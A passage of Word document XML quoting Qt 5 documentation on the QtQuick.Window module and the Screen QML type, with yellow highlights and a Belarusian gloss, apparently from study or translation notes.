    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">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C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This QML module contains </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types for creating top-level windows and accessing screen information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">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C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To use the types in this module, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the module with the following line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:hyperlink r:id="rId1599" w:history="1">
        <w:r w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Window </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="1308"/>
    <w:p w:rsidR="00D143AF" w:rsidRDefault="00C72653" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>http://doc.qt.io/qt-5/qml-qtquick-window-screen.html</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00AD5879">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://doc.qt.io/qt-5/qml-qtquick-window-screen.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00BE3BBD" w:rsidRDefault="00C72653" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1311" w:name="_Toc483000806"/>
      <w:bookmarkStart w:id="1312" w:name="_Toc483003804"/>
      <w:bookmarkStart w:id="1313" w:name="_Toc483604157"/>
      <w:bookmarkStart w:id="1314" w:name="_Toc483605377"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Screen QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1311"/>
      <w:bookmarkEnd w:id="1312"/>
      <w:bookmarkEnd w:id="1313"/>
      <w:bookmarkEnd w:id="1314"/>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Screen attached object</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>valid inside Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Item derived types, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>after component completion</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Inside these items it </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>refers to the screen that the item is currently being displayed on</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The attached object is also </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>valid inside Window or Window derived types, after component completion</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In that case </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it refers to the screen where the Window was created</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is generally</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>better to access the Screen from the relevant Item instead</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>because</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a multi-screen desktop computer, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user can drag a Window into a position where it spans across multiple screens</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In that case some Items will be on one screen, and others on a different screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To use this type, you will need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the module with the following line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:hyperlink r:id="rId1600" w:history="1">
        <w:r w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Window </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>separate import in order to allow you to have a QML environment without access to window system features</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00C72653">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the Screen type </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is not valid at Component.onCompleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>because</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Item or Window has not been displayed on a screen by this time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00BE3BBD" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Аб’ект змяшчае параметры экрана.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1601" w:history="1">
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="00C72653" w:rsidRPr="00C72653">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:i/>
